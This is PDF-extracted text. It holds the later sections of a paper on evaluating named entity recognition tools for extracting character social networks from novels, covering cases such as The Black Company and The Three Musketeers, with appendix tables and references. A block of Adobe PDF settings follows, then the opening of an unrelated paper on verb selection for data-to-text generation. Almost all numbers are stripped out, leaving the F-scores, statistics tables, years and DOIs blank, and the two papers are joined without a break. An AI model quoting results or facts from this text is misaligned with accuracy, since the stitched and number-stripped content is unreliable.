specific novels. these name transformations show that the real-word names and names with special characters were indeed problematic and put forth a problem for future studies to tackle. as illustrated by fig. , the aforementioned issues are also present in the classic novels typically used by related works (such as the three musketeers). this begs the question of the scope of these problems. to the best of our knowledge, similar works have not identified this issue to affect their performances, but we have shown that with a relatively simple workaround, the performance can be drastically improved. it would thus be interesting to evaluate how much these studies suffer from the same issue. lastly, as table unidentified names in the black company replaced by generic english names. original adjusted blue richard croaker thomas curly daniel dancing edward mercy charles one-eye timothy silent james walleye william dekker et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ manually replacing names is clearly far from ideal, we would like to encourage future work to find a more robust approach to resolve this issue. the black company this fantasy novel describes the dealings of an elite mercenary unit—the black company— and its members, all of which go by code names such as the ones in table . with a preliminary f -score of . (see table a ), the black company did not do very well. we found this book had the highest percentage of unidentified characters of our collection. out of the characters found by our annotators, only five were identified by the pipeline. interestingly enough, eight out of the nine unidentified characters in this novel have names that correspond to regular nouns. by applying our name transformation alone, the f -score rose from . to the highest in our collection to . . the three musketeers this classic piece recounts the adventures of a young man named d’artagnan, after he leaves home to join the musketeers of the guard. with an f -score of . (see table a ), the three musketeers performs the second worst of our corpus, and the worst in its class. by simply replacing names such as d’artagnan with dartagnan the f -score rose figure effect of transformations on all affected classic and modern novels in f -score in using the booknlp pipeline (includes co-reference resolution). full-size doi: . /peerj-cs. /fig- dekker et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ from . to , suggesting that the apostrophed name was indeed the main issue. to visualise this, we have included figures of both the three musketeer networks—before and after the fix—in figs. and . as can be observed in fig. , the main character of the novel is hardly represented in this network, which is not indicative of the actual story. the importance of resolving the issue of apostrophed named is made clear in fig. , where the main character is properly represented. chalais m. bonacieux de m. busigny houdiniere la john felton bois-tracy de ma... de m. schomberg lubin porthos monsieur la harpe de rue rochellais richelieu de de busigny monsi... milady clarik rochefort grimaud monsieur m. coquenard de treville mons... mr. felton montague dâartagnan mon... buckingham de mo... de monsieur voit... monsieur bernajo... iii henry monsieur dessess... de chevreuse mad... donna estafania lord duke quixote don lorme de marion de cahusac monsi... bazin chevalier monsie... musketeer constance bonaci... m. dessessart germain de m. cavois judith gascon mousqueton monsieur athos duke monsieur charlotte backson bethune planchet monsieur louis xiii bonacieux madame de benserade mon... gervais meung chesnaye la bonacieux monsie... chrysostom wardes de de m. coquenard monsie... patrick berry mande laporte m. de m. laffemas laporte monsieur louis xiv anne de m. tremouille... norman de m. bassompier... iv henry villiers george bearnais i charles pierre monsieur aramis ... jussac denis gascons coquenard madame crevecoeur picard pope pope de m. treville de marie medicis lorraine #n/a cardinal monsieur fourreau bicarat marie michon mar... lord de winter ii milady de de win... m. dâartagnan duke messieurs porthos kitty figure social network of the three musketeers without adjustment for apostrophed names. full-size doi: . /peerj-cs. /fig- m. bonacieux de m. busigny houdiniere la john felton de m. schomberg porthos monsieur la harpe de rue rochellais de marie medicis milady clarik grimaud monsieur de treville mons... commissary monsi... mr. felton montague buckingham de mo... de monsieur voit... monsieur bernajo... iii henry monsieur dessess... de chevreuse mad... donna estafania lord duke quixote don de cahusac monsi... chevalier monsie... musketeer m. dessessart germain de m. cavois judith monsieur dartagn... mousqueton monsieur athos duke monsieur charlotte backson bethune planchet monsieur louis xiii milady de winter bonacieux madame de benserade mon... gervais meung chesnaye la bonacieux monsie... chrysostom wardes de de m. coquenard monsie... patrick lord de de winter berry mande laporte m. richelieu de godeau laporte monsieur louis xiv anne de m. tremouille... norman de m. bassompier... iv henry villiers george de m. laffemas bearnais pierre monsieur aramis ... jussac denis gascons crevecoeur picard pope pope de m. treville de monsieur cavo... lorraine dangouleme duc #n/a cardinal monsieur fourreau bicarat marie michon mar... i charles duke villeroy messieurs porthos kitty bonacieux consta... figure social network of the three musketeers with adjustment for apostrophed names. full-size doi: . /peerj-cs. /fig- dekker et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ conclusion and future work in this study, we set out to close a gap in the literature when it comes to the evaluation of ner for the creation of social networks from fiction literature. in our exploration of related work, we found no other studies that attempt to compare networks from classic and modern fiction. to fill this gap, we attempted to answer the following two research questions: � to what extent are off-the-shelf ner tools suitable for identifying fictional characters in novels? � which differences or similarities can be discovered between social networks extracted for different novels? to answer our primary research question, we evaluated four state-of-the-art ner systems on classic and modern science fiction/fantasy novels. in our study, we found no significant difference in performance of the named entity recognisers on classic novels and modern novels. we did find that novels written in rd person perspective perform significantly better than those written in st person, which is in line with findings in related studies. in addition, we observed a large amount of variance within each class, even despite our limitation for the modern novels to the fantasy/science fiction genre. we also identified some recurring problems that hindered ner. we delved deeper into two such problematic novels, and find two main issues that overarch both classes. firstly, we found that word names such as mercy are more difficult to identify to the systems. we showed that replacing problematic word names by generic placeholders can increase performance on affected novels. secondly, we found that apostrophed names such as d’artagnan also prove difficult to automatically identify. with fairly simple methods that capture some cultural background knowledge, we circumvented the above two issues to drastically increase the performance of the used pipeline. to the best of our knowledge, none of the related studies discussed in the section ‘related work’ acknowledge the presence of these issues. we would thus like to encourage future work to evaluate the impact of these two issues on existing studies, and call to develop a more robust approach to tackle them in future studies. to answer our secondary research question, we created social networks for each of the novels in our collection and calculated several networks features with which we compared the two classes. as with the ner experiments, no major differences were found between the classic and modern novels. again, we found that the distribution of network measures within a class was subject to high variance, which holds for our collection of both classic and modern novels. we therefore recommend that future work focuses on determining particular characteristics that can influence these analyses first and then perform a comparative analysis between subsets to see if this similarity between classes holds when the variance is reduced. future studies could therefore attempt to compare classic and modern novels in the same genre or narration type (e.g. first-person vs third-person perspective). lastly, different types of networks that for example collapse characters that occur under different names (cf. dany and daenerys) as well as dealing with plural pronouns and group membership (e.g. characters sometimes mentioned dekker et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ individually and sometimes as part of a group) are currently unsolved problems for language technology and knowledge representation. these issues point to a strong need for more culturally-aware artificial intelligence. appendix: additional statistics table a characters that were not identified by the system, supplied by the annotators. classic modern ada howard mrs. billington archmage of ymitury† manie algy joanna mrs. birch† august† meena alice johnny mrs. crisp† bil baker† mercy† anna boleyne jolly miller† mrs. effington stubbs blue† mrs. potter† aprahamian leonard mrs. thingummy brine cutter† old cob† belisarius lord mayor† murray bug† one-eye† best-ingram lory† nathan swain† chyurda pappa doc† cain major dover† peter teazle† cotillion† patience† caroline marie antoinette policar morrel† croaker† plowman† catherine marshal bertrand† president west† curly† poul cato matilda carbury queequeg dadda rand† cervantes matron† rip van winkle† dancing† shalash christine miss birch† royce domi shrewd† chuck loyola† miss crump† sawbones† dow† silent† cleopatra miss hopkins† semiramis elam dowtry sirius† connolly norman† miss king† shep elao talenel curly† miss saltire† sir carbury fredor talenelat dante miss swindle† skrimshander† gart ted dave mme. d’artagnan stamford harold the empress† dives† mollie stigand harvey themos tresting dodo† mouse† sudeley howard theron dr. floss† mr. stroll† swubble ien threetrees duck† mr. thursgood the director† ilgrand lender† toffston edgar atheling† mr. beaufort† tommy barnes ishar verus elmo mr. crisp† unwin ishi walleye† farmer mitchell† mr. flowerdew ursula jim mcguffin† weasel† father joseph† mr. lawrence victor† kerible the enchanter† willum fury† mr. morris vilkins lilly† wit congar† ginny mrs loveday von bischoff henry viii mrs. bates† ysabel out of characters: % out of characters: % note: characters whose names (partly) consist of a real word—such as ‘curly’ or ‘mercy’—are marked with a †. checked against http://dictionary.com. dekker et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dictionary.com http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ table a classic and modern novels included in this study. classic title author (year) e-book no./isbn george orwell ( ) a study in scarlet conan doyle ( ) alice in wonderland lewis carroll ( ) brave new world aldous huxley ( ) david copperfield charles dickins ( ) dracula bram stoker ( ) emma jane austen ( ) frankenstein mary shelley ( ) huckleberry finn mark twain ( ) jekyll and hyde robert stevenson ( ) moby dick herman melville ( ) oliver twist charles dickins ( ) pride and prejudice jane austen ( ) the call of the wild jack london ( ) the count of monte cristo alexandre dumas ( ) the fellowship of the ring j. r. r. tolkien ( ) the three musketeers alexandre dumas ( ) the way we live now anthony trollope ( ) ulysses james joyce ( ) vanity fair william thackeray ( ) modern a game of thrones g.r.r. martin ( ) assassin’s apprentice robin hobb ( ) elantris brandon sanderson ( ) gardens of the moon steven erikson ( ) harry potter j.k. rowling ( ) magician raymond feist ( ) mistborn brandon sanderson ( ) prince of thorns mark lawrence ( ) storm front jim butcher ( ) the black company glen cook ( ) the black prism brent weeks ( ) the blade itself joe abercrombie ( ) the colour of magic terry pratchett ( ) the gunslinger steven king ( ) the lies of locke lamora scott lynch ( ) the name of the wind patrick rothfuss ( ) the painted man peter brett ( ) the way of kings brandon sanderson ( ) the wheel of time robert jordan ( ) way of shadows brent weeks ( ) note: the short e-book numbers are the catalog entry of novels obtained from gutenberg. novels obtained through online purchase are denoted by the longer isbns. dekker et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ table a overall statistics for classic and modern novels in our corpus. classic title fraction of defaults fraction of unidentified characters average sentence length average persons per sentence fraction of sentences with a person annotated sentences unique characters total character mentions . . † . . . , a study in scarlet . . . . . alice in wonderland . . ⋄ . . . brave new world . . . . . , david copperfield . . † . . . , dracula . ⋄ . † . . † . † , emma . . . . . , frankenstein . . . . . huckleberry finn . . . . . , jekyll and hyde . . . . . † † † moby dick . . . . . , oliver twist . . . . . , pride and prejudice . . . . . , the call of the wild . . . . . the count of monte cristo . . . . . , the lord of the rings . . . . . ⋄ , the three musketeers . . . . . , the way we live now . . . . . , ⋄ ulysses . . . † . . ⋄ , vanity fair . † . . ⋄ . ⋄ . ⋄ , mean m . . . . . . . , . standard deviation s . . . . . . . , . modern a game of thrones . . † . . . ⋄ ⋄ , ⋄ assassin’s apprentice . . . . . , elantris . . . . . † † gardens of the moon . . . . † . , harry potter . . . . . , magician . . . . . , mistborn . . . . . , prince of thorns . . † . . . , storm front . . † . . . , the black company . . ⋄ . † . . , the black prism . . . . . , the blade itself . . . . . , the colour of magic . . . . . , the gunslinger . ⋄ . . . . † , the lies of locke lamora . † . . ⋄ . ⋄ . , (continued) dekker et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ table a (continued). classic title fraction of defaults fraction of unidentified characters average sentence length average persons per sentence fraction of sentences with a person annotated sentences unique characters total character mentions the name of the wind . . . . . , the painted man . . . . . , the way of kings . . . . . , the wheel of time . . . . . ⋄ , way of shadows . . . . . † , mean m . . . . . . . , . standard deviation s . . . . . . . , . mclassic - mmodern . . . . . . . - , . pooled s . . . . . , p-value . . > . . . . . . significant no no yes no no no no no note: the highest scores in each column are highlighted with a ⋄, and the lowest scores with a †. the highest and lowest performing books for each class, in terms of f -score found in tables a and a , are marked with a grey fill. boldface indicate the highest and lowest scores in each column. table a results of the complete booknlp pipeline: named entity recognition (stanford ner), character name clustering (e.g. ‘tom’, ‘tom sawyer’, ‘mr. sawyer’, ‘thomas sawyer’ / tom_sawyer) and pronominal coreference resolution. classic modern title precision recall f -score title precision recall f -score . . . a game of thrones . . . a study in scarlet⊙ . . . assassin’s apprentice⊙ . . . alice in wonderland . . . elantris . . . brave new world . . . gardens of the moon . . . david copperfield⊙ . . . harry potter . ⋄ . ⋄ . ⋄ dracula⊙ . . . magician . . . emma . ⋄ . ⋄ . ⋄ mistborn . . . frankenstein⊙ . . . prince of thorns . . . huckleberry finn . . . storm front⊙ . . . jekyll and hyde . . . the black company⊙ . † . † . † moby dick⊙ . . . the black prism . . . oliver twist . . . the blade itself . . . pride and prejudice . . . the colour of magic . . . the call of the wild . . . the gunslinger . . . the count of monte cristo . . . the lies of locke lamora . . . the fellowship of the ring . . . the name of the wind . . . the three musketeers . † . † . † the painted man . . . the way we live now . . . the way of kings . . . ulysses . . . the wheel of time . . . vanity fair . . . way of shadows . . . dekker et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ table a (continued). classic modern title precision recall f -score title precision recall f -score mean m . . . mean m . . . standard deviation s . . . standard deviation s . . . note: the highest scores in each column are highlighted with a ⋄, and the lowest scores with a †. novels written in st person are marked with a ⊙. boldface indicate the highest and lowest scores in each column. table a social network measures for classic and modern novels. classic title nodes edges average degree average weighted degree network diameter graph density modularity connected components average clustering coefficient average path length . . . . . . a study in scarlet . . . . . . alice in wonderland † . † . † . . † . brave new world . . . . . . david copperfield . . . . . . dracula . . . . † . . emma . . ⋄ . . . . frankenstein . . . . . . huckleberry finn . . . . ⋄ . . jekyll and hyde † . . † . ⋄ . . ⋄ . † moby dick . . . . . . ⋄ oliver twist . . . . . . pride and prejudice . . . . . . the call of the wild . . . . . . the count of monte cristo . . . . . . the fellowship of the ring . . . . . . the three musketeers . . . . . . the way we live now . . . . . . ulysses ⋄ , ⋄ . ⋄ . ⋄ . . ⋄ . . vanity fair , . . . † . . . mean m . . . . . . . standard deviation s . . . . . . . . . . modern a game of thrones ⋄ , ⋄ . ⋄ . . . . . assassin’s apprentice . . . . . . elantris . . ⋄ . . . . † gardens of the moon . . . . . . harry potter . . . . . . magician . . . . . . (continued) dekker et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ additional information and declarations funding the authors received no funding for this work. competing interests the authors declare that they have no competing interests. author contributions � niels dekker conceived and designed the experiments, performed the experiments, analysed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. � tobias kuhn contributed reagents/materials/analysis tools, authored or reviewed drafts of the paper, approved the final draft. table a (continued). classic title nodes edges average degree average weighted degree network diameter graph density modularity connected components average clustering coefficient average path length mistborn . . . . † . . prince of thorns . . . . . † . storm front . . † . ⋄ . . . the black company . † . † . . . . the black prism . . . . . ⋄ . the blade itself . . . . . . the colour of magic † † . . . . . . the gunslinger . . . . . . the lies of locke lamora . . . . . . the name of the wind . . ⋄ . . ⋄ . . ⋄ the painted man . . . . . . the way of kings . . . † . ⋄ . . the wheel of time . . . . . . way of shadows . . . . . . mean m . . . . . . . standard deviation s . . . . . . . . . . mclassic - mmodern . - . . - . . . - . pooled s . . . . . . . . p-value . . . . . . . . . . significant no no no no no no no no no no note: the highest scores in each column are highlighted with a ⋄, and the lowest scores with a †. the highest and lowest performinag books for each class, in terms of f -score found in tables and , are marked with a grey fill. boldface indicate the highest and lowest scores in each column. dekker et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ � marieke van erp conceived and designed the experiments, contributed reagents/ materials/analysis tools, authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: code and data are available at github: https://github.com/niels-dekker/out-with-the- old-and-in-with-the-novel. references agarwal a, corvalan a, jensen j, rambow o. . social network analysis of alice in wonderland. in: proceedings of the naacl-hlt workshop on computational linguistics for literature. uppsala: association for computational linguistics, – . agarwal a, kotalwar a, rambow o. . automatic extraction of social networks from literary text: a case study on alice in wonderland. in: sixth international joint conference on natural language processing (ijnlp ). nagoya: asian federation for natural language processing, – . agerri r, rigau g. . robust multilingual named entity recognition with shallow semi- supervised features. artificial intelligence : – doi . /j.artint. . . . akimushkin c, amancio dr, oliveira on jr. . text authorship identified using the dynamics of word co-occurrence networks. plos one ( )e doi . /journal.pone. . amancio dr. . probing the topological properties of complex networks modeling short written texts. plos one ( )e doi . /journal.pone. . ardanuy mc, sporleder c. . structure-based clustering of novels. in: proceedings of the eacl workshop on computational linguistics for literature. gothenburg: sweden association for computational linguistics, – . bamman d, underwood t, smith na. . a bayesian mixed effects model of literary character. in: proceedings of the nd annual meeting of the association for computational linguistics (acl ). baltimore: association for computational linguistics, – . biber d, finegan e. . drift and the evolution of english style: a history of three genres. language ( ): – doi . / . blondel vd, guillaume j-l, lambiotte r, lefebvre e. . fast unfolding of communities in large networks. journal of statistical mechanics: theory and experiment ( ):p doi . / - / / /p . boccaletti s, latora v, moreno y, chavez m, hwang d-u. . complex networks: structure and dynamics. physics reports ( – ): – . bringhurst r. . the elements of typographic style. british columbia: hartley & marks vancouver. chambers n, jurafsky d. . unsupervised learning of narrative event chains. in: proceedings of the th annual meeting of the association for computational linguistics (acl ), vol. . columbus: association for computational linguistics, – . danon l, diaz-guilera a, duch j, arenas a. . comparing community structure identification. journal of statistical mechanics: theory and experiment ( ):p doi . / - / / /p . dekker et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/niels-dekker/out-with-the-old-and-in-with-the-novel https://github.com/niels-dekker/out-with-the-old-and-in-with-the-novel http://dx.doi.org/ . /j.artint. . . http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . / http://dx.doi.org/ . / - / / /p http://dx.doi.org/ . / - / / /p http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ de does j, depuydt k, van dalen-oskam k, marx m. . namescape: named entity recognition from a literary perspective. in: odijk j, van hessen a, eds. clarin in the low countries. london: ubiquity press, – . dijkstra ew. . a note on two problems in connexion with graphs. numerische mathematik ( ): – doi . /bf . elson dk, dames n, mckeown kr. . extracting social networks from literary fiction. in: proceedings of the th annual meeting of the association for computational linguistics, uppsala: association for computational linguistics, – . elson dk, mckeown k. . automatic attribution of quoted speech in literary narrative. in: proceedings of the th aaai conference on artificial intelligence (aaai- ). atlanta: association for the advancement of artificial intelligence. fernandez m, peterson m, ulmer b. . extracting social network from literature to predict antagonist and protagonist. technical report. stanford: stanford university. available at https://nlp.stanford.edu/courses/cs n/ /reports/ .pdf. finkel jr, grenager t, manning c. . incorporating non-local information into information extraction systems by gibbs sampling. in: proceedings of the rd annual meeting on association for computational linguistics. ann arbor: association for computational linguistics, – . he h, barbosa d, kondrak g. . identification of speakers in novels. in: proceedings of the st annual meeting of the association for computational linguistics (acl ), sofia: association for computational linguistics, – . kumar r, novak j, tomkins a. . structure and evolution of online social networks. in: philip sy, jiawei h, christos f, eds. link mining: models, algorithms, and applications. new york: springer-verlag, – . lee j, yeung cy. . extracting networks of people and places from literary texts. in: proceedings of the th pacific asia conference on language, information, and computation (paclic ). bali: faculty of computer science universitas indonesia, – . mac carron p, kenna r. . universal properties of mythological networks. epl (europhysics letters) ( ): doi . / - / / . mccrum r. . the greatest novels of all time: the list. the guardian. available at https://www.theguardian.com/books/ /oct/ /features.fiction (accessed october ). mislove a, marcon m, gummadi kp, druschel p, bhattacharjee b. . measurement and analysis of online social networks. in: in: proceedings of the th acm sigcomm conference on internet measurement. new york: acm, – . moretti f. . distant reading. brooklyn: verso books. newman me. . modularity and community structure in networks. proceedings of the national academy of sciences of the united states of america ( ): – . ratinov l, roth d. . design challenges and misconceptions in named entity recognition. in: proceedings of the th conference on computational natural language learning (conll- ). boulder: association for computational linguistics, – . sainte-beuve ca. . what is a classic? in: eliot cw, ed. literary and philosophical essays: french, german and italian, volume of the harvard classics p. f. collier & son corporation. scott j. . social network analysis. london: sage. telesford qk, joyce ke, hayasaka s, burdette jh, laurienti pj. . the ubiquity of small-world networks. brain connectivity ( ): – doi . /brain. . . travers j, milgram s. . the small world problem. phychology today : – . dekker et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /bf https://nlp.stanford.edu/courses/cs n/ /reports/ .pdf http://dx.doi.org/ . / - / / https://www.theguardian.com/books/ /oct/ /features.fiction http://dx.doi.org/ . /brain. . https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. vala h, jurgens d, piper a, ruths d. . mr. bennet, his coachman, and the archbishop walk into a bar but only one of them gets recognized: on the difficulty of detecting characters in literary texts. in: proceedings of the conference on empirical methods in natural language processing. lisbon: association for computational linguistics, – . van dalen-oskam k, de does j, marx m, sijaranamual i, depuydt k, verheij b, geirnaert v. . named entity recognition and resolution for literary studies. computational linguistics in the netherlands journal : – . wasserman s, faust k. . social network analysis: methods and applications. vol. . cambridge: cambridge university press. watts dj, strogatz sh. . collective dynamics of ‘small-world’ networks. nature ( ): – doi . / . dekker et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. evaluating named entity recognition tools for extracting social networks from novels introduction related work materials and data preparation named entity recognition experiments and results network analysis discussion and performance boosting options conclusion and future work appendix: additional statistics references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice probabilistic verb selection for data-to-text generation dell zhang† , jiahao yuan‡, xiaoling wang‡ , and adam foster† †birkbeck, university of london, malet street, london wc e hx, uk ‡shanghai key lab of trustworthy computing, east china normal university, north zhongshan road, shanghai , china dell.z@ieee.org, xlwang@sei.ecnu.edu.cn abstract in data-to-text natural language generation (nlg) systems, computers need to find the right words to describe phenomena seen in the data. this paper focuses on the problem of choosing appropriate verbs to express the di- rection and magnitude of a percentage change (e.g., in stock prices). rather than simply using the same verbs again and again, we present a principled data-driven approach to this prob- lem based on shannon’s noisy-channel model so as to bring variation and naturalness into the generated text. our experiments on three large-scale real-world news corpora demon- strate that the proposed probabilistic model can be learned to accurately imitate human authors’ pattern of usage around verbs, outperforming the state-of-the-art method significantly. introduction natural language generation (nlg) is a fundamen- tal task in artificial intelligence (ai) (russell and norvig, ). it aims to automatically turn struc- tured data into prose (reiter, ; belz and kow, ) — the opposite of the better-known field of natural language processing (nlp) that transforms raw text into structured data (e.g., a logical form or a knowledge base) (jurafsky and martin, ). being dubbed “algorithmic authors” or “robot journalists”, nlg systems have attracted a lot of attention in re- cent years, thanks to the rise of big data (wright, ). the use of nlg in financial services has been growing very fast. one particularly important nlg problem for summarizing financial or business data is to automatically generate textual descriptions of trends between two data points (such as stock prices). in this paper, we elect to use relative percentages rather than absolute numbers to describe the change from one data point to another. this is because an absolute number might be considered small in one case but large in another, depending on the unit and the context (krifka, ; smiley et al., ). for example, british pounds are worth much more than japanese yen; a rise of us dollars in car price might be negligible but the same amount of increase in bike price would be significant. given two data points (e.g., on a stock chart), the percentage change can always be calculated easily. the challenge is to select the appropriate verb for any percentage change. for example, in newspa- pers, we often see headlines like “apple’s stock had jumped % this year in anticipation of the next iphone . . . ” and “microsoft’s profit climbed % with shift to web-based software . . . ”. the journal- ists writing such news stories use descriptive lan- guage such as the verbs like jump and climb to express the direction and magnitude of a percent- age change. it is of course possible to simply keep using the same neutral verbs, e.g., increase and decrease for upward and downward changes re- spectively, again and again, as in most existing data- to-text nlg systems. however, the generated text would sound much more natural if computers could use a variety of verbs suitable in the context like human authors do. expressions of percentage changes are readily available in many natural language text datasets and transactions of the association for computational linguistics, vol. , pp. – , . action editor: alexander koller. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. can be easily extracted. therefore computers should be able to learn from such expressions how people de- cide which verbs to use for what kind of percentage changes. in this paper, we address the problem of verb se- lection for data-to-text nlg through a principled data-driven approach. specifically, we show how to employ bayesian reasoning to train a probabilistic model for verb selection based on large-scale real- world news corpora, and demonstrate its advantages over existing verb selection methods. the rest of this paper is organized as follows. in section , we review the related work in literature. in section , we describe the dataset used for our inves- tigation. in section , we present our probabilistic model for verb selection in detail. in section , we conduct experimental evaluation. in section , we discuss possible extensions to the proposed approach. in section , we draw conclusions. related work the most successful nlg applications, from the com- mercial perspective, have been data-to-text nlg sys- tems which generate textual descriptions of databases or datasets (reiter, ; belz and kow, ). a typical example is the automatic generation of tex- tual weather forecasts from weather data that has been used by environment canada and uk met of- fice (goldberg et al., ; belz, ; sripada et al., ). the trend system (boyd, ) focuses on generating descriptions of historical weather patterns. their method concentrates primarily on the detection of upward and downward trends in the weather data, and uses a limited set of verbs to describe different types of movements. 